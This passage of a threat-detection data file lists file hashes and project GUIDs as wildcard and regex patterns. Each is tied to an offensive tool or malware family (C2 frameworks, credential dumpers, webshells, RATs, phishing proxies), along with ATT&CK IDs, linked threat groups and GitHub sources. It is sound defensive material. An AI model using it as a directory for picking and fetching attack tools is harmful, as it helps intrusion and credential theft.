Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","24894" 
"*3a5dbd02b77211a50f970d07e5f7cb993788770bb9ea8e9c2af3041aefbb25b5*",".{0,1000}3a5dbd02b77211a50f970d07e5f7cb993788770bb9ea8e9c2af3041aefbb25b5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24895" "*3a6431169073d61748829c31a9da29123dd61da8*",".{0,1000}3a6431169073d61748829c31a9da29123dd61da8.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","24896" "*3a6b11aead22bb17534fcf1c45fe49cb11b09e3a5340f716abcfa21fdb2e0809*",".{0,1000}3a6b11aead22bb17534fcf1c45fe49cb11b09e3a5340f716abcfa21fdb2e0809.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24898" "*3a71764fed9b90c2b7a05ca5cac028dc9980d5d4da2b53570f490b43c829f0c0*",".{0,1000}3a71764fed9b90c2b7a05ca5cac028dc9980d5d4da2b53570f490b43c829f0c0.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","24899" "*3a7f12e2da6e68b00f1a0aff9b515e7c623da2304f729ed756e01582ddfb62aa*",".{0,1000}3a7f12e2da6e68b00f1a0aff9b515e7c623da2304f729ed756e01582ddfb62aa.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","24902" "*3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20*",".{0,1000}3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24904" "*3a87abf646b679217d7c67e45c5df4bac7b3ea9f5e33ccd7ad82b964d0bc73a7*",".{0,1000}3a87abf646b679217d7c67e45c5df4bac7b3ea9f5e33ccd7ad82b964d0bc73a7.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","24905" "*3a8e6fe87d5cea3b118aa6b900c63cf7c9d0e4fe3c3bced830861f2835caea33*",".{0,1000}3a8e6fe87d5cea3b118aa6b900c63cf7c9d0e4fe3c3bced830861f2835caea33.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24906" "*3a8f9dbdb5a70ab427c99799ea3782cb768576d1affd329293f994f665bc2dc8*",".{0,1000}3a8f9dbdb5a70ab427c99799ea3782cb768576d1affd329293f994f665bc2dc8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24907" "*3a9144c6468bfab90def18913d6119462ae1e972f4dc0c1ce0f9492afe3861c0*",".{0,1000}3a9144c6468bfab90def18913d6119462ae1e972f4dc0c1ce0f9492afe3861c0.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","24908" "*3a9e7e5269489c8fbbd4c0f4786a8b8cef7a1e79a7a02b7f14850c696d0f3baf*",".{0,1000}3a9e7e5269489c8fbbd4c0f4786a8b8cef7a1e79a7a02b7f14850c696d0f3baf.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation 
tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","cve-2019-0708","10","10","N/A","N/A","N/A","N/A","24909" "*3a9ed2f23a034826d0ed1ef03f582b92e74cd4122abb9ae8f8243480d1c4411c*",".{0,1000}3a9ed2f23a034826d0ed1ef03f582b92e74cd4122abb9ae8f8243480d1c4411c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24910" "*3aa113440e9f684df0d0f889c69ae914a40b07c10a340d1fad4f8365286fe19d*",".{0,1000}3aa113440e9f684df0d0f889c69ae914a40b07c10a340d1fad4f8365286fe19d.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#filehash","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","24911" "*3aa2845ca86220e20ba6e4f2f08ff1aad9aa4c2cb47c38213bbf21e7fdd87b03*",".{0,1000}3aa2845ca86220e20ba6e4f2f08ff1aad9aa4c2cb47c38213bbf21e7fdd87b03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools.
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24912" "*3aaa5fde51d080a80e911b350db316669db2ca264b1b6f55cdac91d1ad5267bf*",".{0,1000}3aaa5fde51d080a80e911b350db316669db2ca264b1b6f55cdac91d1ad5267bf.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","24913" "*3aad76afcc5d9d5629cb512ca3f8c500fa381231bf15d51b797e30768d5e0e78*",".{0,1000}3aad76afcc5d9d5629cb512ca3f8c500fa381231bf15d51b797e30768d5e0e78.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24914" 
"*3aafc3d5f312ebd5b34219e53e22592f82b039fffe70322982a03a498c604d3a*",".{0,1000}3aafc3d5f312ebd5b34219e53e22592f82b039fffe70322982a03a498c604d3a.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","24915" "*3ab344b38cb1d65babee1a52210280c415e6839642bbf7e7b9c4cc53d5b72f04*",".{0,1000}3ab344b38cb1d65babee1a52210280c415e6839642bbf7e7b9c4cc53d5b72f04.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24916" "*3ac48e132a8186b8302e04c77c22c4ff2984e6b6bd16bf65361cd1b751559703*",".{0,1000}3ac48e132a8186b8302e04c77c22c4ff2984e6b6bd16bf65361cd1b751559703.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24918" "*3ac89800bd6dc53207c19d3d35161342cc19bc09a212710393ec9ab79fb55ba1*",".{0,1000}3ac89800bd6dc53207c19d3d35161342cc19bc09a212710393ec9ab79fb55ba1.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","24919" "*3ad40dadb3c6030e56a037a58baf9111cc7d6a3a2bd02785f3d2fb1a0e38681d*",".{0,1000}3ad40dadb3c6030e56a037a58baf9111cc7d6a3a2bd02785f3d2fb1a0e38681d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24921" "*3ad929cff8321e12459ff5053015cbcae9e4262652210e270077b7a8587e2567*",".{0,1000}3ad929cff8321e12459ff5053015cbcae9e4262652210e270077b7a8587e2567.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24922" "*3ADB8BB1-AE14-49DA-A7E1-1C0D9BEB76E9*",".{0,1000}3ADB8BB1\-AE14\-49DA\-A7E1\-1C0D9BEB76E9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open 
source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24923" "*3addcddea9689e047b939a8c8337d200212550f5c3f2b60fd66aceb7c0ee98cb*",".{0,1000}3addcddea9689e047b939a8c8337d200212550f5c3f2b60fd66aceb7c0ee98cb.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24924" "*3adf9833e9f51c6a887107d4d4b402138fbeb11c633440f9085f0a93fe1d0afa*",".{0,1000}3adf9833e9f51c6a887107d4d4b402138fbeb11c633440f9085f0a93fe1d0afa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24926" "*3ae0b0ec554f725076ca89389d9a3523e503a24248ee8a9b342f68c156e77b12*",".{0,1000}3ae0b0ec554f725076ca89389d9a3523e503a24248ee8a9b342f68c156e77b12.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#filehash","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","24927"
"*3ae2ec1c3a9cb120b6c296aed13dfc8973449c74e8a93ed0de0f3b85ef8990d3*",".{0,1000}3ae2ec1c3a9cb120b6c296aed13dfc8973449c74e8a93ed0de0f3b85ef8990d3.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24928" "*3aefe6d2e264cb53be7ea8609f4d80d6264d98d051b446821e6efff94ce2baa6*",".{0,1000}3aefe6d2e264cb53be7ea8609f4d80d6264d98d051b446821e6efff94ce2baa6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24929" "*3af0857c9fae7e41683d34af7e04c6ed29439466761512ebbf28bad7561d092b*",".{0,1000}3af0857c9fae7e41683d34af7e04c6ed29439466761512ebbf28bad7561d092b.{0,1000}","offensive_tool_keyword","Termite","Termite rootkit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","24930" "*3aff2f105c353378acd29dc43635769952d715d50e8cc87df39acf938c06d7c6*",".{0,1000}3aff2f105c353378acd29dc43635769952d715d50e8cc87df39acf938c06d7c6.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","24931"
"*3b02572ebc1fa9eb22898bc2f17f72d50775a18d4c6ff3094ea19e5b5f25c949*",".{0,1000}3b02572ebc1fa9eb22898bc2f17f72d50775a18d4c6ff3094ea19e5b5f25c949.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24932" "*3b0506a5e557ba240500e7fa9017722ba54282eb8f917ea94a403854e4effc66*",".{0,1000}3b0506a5e557ba240500e7fa9017722ba54282eb8f917ea94a403854e4effc66.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","24935" "*3b0c09c1852353c15372d27a6c0971472ef165c093024073990446219a887034*",".{0,1000}3b0c09c1852353c15372d27a6c0971472ef165c093024073990446219a887034.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","24936" "*3b16492476a023f26e1c2539fbe209b60f80194e700983d2b3015827cf299e5d*",".{0,1000}3b16492476a023f26e1c2539fbe209b60f80194e700983d2b3015827cf299e5d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24938" "*3b1e2b01bfa6ad0deefa3bf8e7a81e9fc295e56b8f087ef402d9a06e42ec3b95*",".{0,1000}3b1e2b01bfa6ad0deefa3bf8e7a81e9fc295e56b8f087ef402d9a06e42ec3b95.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","#filehash","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","24939" "*3b2aea9615c1f94c724af17885c4587e9818652ff92e4debd002522e7be96a58*",".{0,1000}3b2aea9615c1f94c724af17885c4587e9818652ff92e4debd002522e7be96a58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24941" "*3b3b3491978395ddceeab0ee18aa25ae8fcb1a8df43ef80ab4423517e9c5f566*",".{0,1000}3b3b3491978395ddceeab0ee18aa25ae8fcb1a8df43ef80ab4423517e9c5f566.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral 
Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","24944" "*3b3fd00d44c44dbb8387dcd1b41772fb3fdd14b15d24d2af981d9da783545b68*",".{0,1000}3b3fd00d44c44dbb8387dcd1b41772fb3fdd14b15d24d2af981d9da783545b68.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","24945" "*3b40063cfd6244dbed0690aefe5a81f7b089677239237bfe8536eaa548c8b997*",".{0,1000}3b40063cfd6244dbed0690aefe5a81f7b089677239237bfe8536eaa548c8b997.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24946" "*3b45f3db658c4628a97d2d8efa567415cb2e4cfc8a397570f0d33cc97c1aa78c*",".{0,1000}3b45f3db658c4628a97d2d8efa567415cb2e4cfc8a397570f0d33cc97c1aa78c.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","24947" "*3B47EEBC-0D33-4E0B-BAB5-782D2D3680AF*",".{0,1000}3B47EEBC\-0D33\-4E0B\-BAB5\-782D2D3680AF.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos 
AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#GUIDproject","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","24948" "*3b486b14426ff6bb3e2c4e9d5d92821a50d5ef26f32e9ba244ca73fdfd81ec66*",".{0,1000}3b486b14426ff6bb3e2c4e9d5d92821a50d5ef26f32e9ba244ca73fdfd81ec66.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24949" "*3b5038e3fcb6d73f7916f9f70bf8725e11caaed2e0b5cc367a85b7ddb66c62ca*",".{0,1000}3b5038e3fcb6d73f7916f9f70bf8725e11caaed2e0b5cc367a85b7ddb66c62ca.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24950" "*3b5369544fbeb32a7685da8992f08261e7ce6b12159b3920618c29a7af930f0a*",".{0,1000}3b5369544fbeb32a7685da8992f08261e7ce6b12159b3920618c29a7af930f0a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - 
T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24951" "*3b61efcac1e3a7512a89d104037349f917e562139db0f92c28de29b2e216f82f*",".{0,1000}3b61efcac1e3a7512a89d104037349f917e562139db0f92c28de29b2e216f82f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24954" "*3b66b9ef669a7aca55f87ccce04ab1849d23d18c522b5f2514ca0637398ca250*",".{0,1000}3b66b9ef669a7aca55f87ccce04ab1849d23d18c522b5f2514ca0637398ca250.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","24955" "*3b6a44069c343b15c9bafec9feb7d5597f936485c68f29316e96fe97aa15d06d*",".{0,1000}3b6a44069c343b15c9bafec9feb7d5597f936485c68f29316e96fe97aa15d06d.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. 
